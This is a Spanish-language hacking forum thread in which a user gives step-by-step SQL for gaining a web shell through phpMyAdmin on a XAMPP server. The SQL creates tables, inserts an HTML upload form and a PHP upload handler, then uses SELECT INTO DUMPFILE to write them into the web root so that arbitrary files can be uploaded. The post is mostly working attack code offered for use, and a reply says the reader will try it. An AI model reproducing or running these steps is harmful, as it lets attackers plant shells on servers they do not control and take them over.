Subir shell desde phpmyadmin (xampp)

Iniciado por Decode, Julio 09, 2015, 03:29:07 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 09, 2015, 03:29:07 PM Ultima modificación: Julio 17, 2018, 05:19:01 PM por Decode
Hola gente, aquí les vengo a enseñar como subir una shell desde phpmyadmin:

1- Lo primero que debemos hacer es tener acceso al phpmyadmin.
2- Luego crear una base de datos dentro del phpmyadmin con el nombre que quieran.
3- Luego de que la base de datos este creada nos vamos a SQL y empezamos a poner los siguientes códigos:

El primero es este:

Código: text
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;


Luego de haber hecho esto debemos dar a continuar y poner un nuevo código, que es este:

Código: text
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;


Luego de haber hecho este segundo paso insertamos el nuevo código con los mismos pasos anteriores, que es este:

Código: text
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload</title>
</head>
<body bgcolor="black">
<div style=" color:white;text-align:center; margin-top:60px; font-size:25px;
">Upload</div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;"> 
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>');


Luego de haber insertado el tercer código nos vamos a lo siguiente:

Código: text
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform


Luego de haber hecho este paso insertaremos el siguiente código con los mismos pasos anteriores:

Código: text
INSERT INTO user_upload
VALUES (
"<?php $uploaddir = 'C:/xampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if 

(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=black></br></br><div 

align=center><font size=5 color=white>File uploaded successfully</font></body>'; } else { print '<body 

bgcolor=black></br></br><div align=center><font size=5 color=red>Error when uploading the file</font></body>'; } ?> "
)


Ya hecho este penúltimo paso nos vamos al último código que nos dará el privilegio de subir la shell al directorio principal del servidor:

Código: text
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload


Ya terminado todos estos pasos tendremos el privilegio de subir shell al directorio principal y tener acceso al servidor o host. Para dirigirnos al upload debemos ir a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y así podremos subir la shell.

Saludos.
Julio 09, 2015, 04:51:14 PM #1
Interesante BRO!

andaba buscando algo así, lo probaré y les cuento como me va.



Saludos!
Nivel 77 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Imprimir
Ir Arriba Páginas1
Acciones del Usuario